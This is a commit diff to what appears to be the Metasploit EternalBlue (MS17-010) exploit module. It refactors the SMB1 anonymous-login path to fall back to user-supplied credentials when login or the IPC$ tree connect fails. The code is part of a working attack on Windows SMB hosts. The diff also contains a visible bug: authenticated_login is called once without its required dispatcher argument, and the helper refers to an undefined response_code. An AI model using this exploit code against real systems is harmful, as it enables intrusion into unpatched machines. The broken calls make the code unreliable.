improve the cred fallback

David Maloney · David Maloney · commit 4ffe666b52c2 · 2017-05-24T17:36:07.000-05:00
we might get a successful sessionsetup
but a failure on IPC$ due to anonymous access
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -289,33 +289,29 @@ def smb2_grooms(grooms, payload_hdr_pkt)
     end
   end
 
-  def smb1_anonymous_connect_ipc()
+  def smb1_anonymous_connect_ipc
     sock = connect(false)
     dispatcher = RubySMB::Dispatcher::Socket.new(sock)
     client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
     response_code = client.login
 
+    authed = false
     unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
-      if datastore['SMBUser'].present? && datastore['SMBPass'].present?
-        client = RubySMB::Client.new(
-          dispatcher,
-          smb1: true,
-          smb2: false,
-          username: datastore['SMBUser'],
-          password: datastore['SMBPass'],
-          domain: datastore['SMBDomain']
-        )
-        response_code = client.login
-
-        unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
-          raise RubySMB::Error::UnexpectedStatusCode, "Error with credentialed login: #{response_code.to_s}"
-        end
+      client = authenticated_login(dispatcher)
+      authed = true
+    end
+    os = client.peer_native_os
+
+    begin
+      tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      if authed
+        raise e
       else
-        raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login: #{response_code.to_s}"
+        client = authenticated_login
+        tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
       end
     end
-    os = client.peer_native_os
-    tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
 
     return client, tree, sock, os
   end
@@ -782,4 +778,25 @@ def make_kernel_shellcode
 
   end
 
+  def authenticated_login(dispatcher)
+    if datastore['SMBUser'].present? && datastore['SMBPass'].present?
+      client = RubySMB::Client.new(
+        dispatcher,
+        smb1: true,
+        smb2: false,
+        username: datastore['SMBUser'],
+        password: datastore['SMBPass'],
+        domain: datastore['SMBDomain']
+      )
+      response_code = client.login
+
+      unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
+        raise RubySMB::Error::UnexpectedStatusCode, "Error with credentialed login: #{response_code.to_s}"
+      end
+    else
+      raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login: #{response_code.to_s}"
+    end
+    client
+  end
+
 end
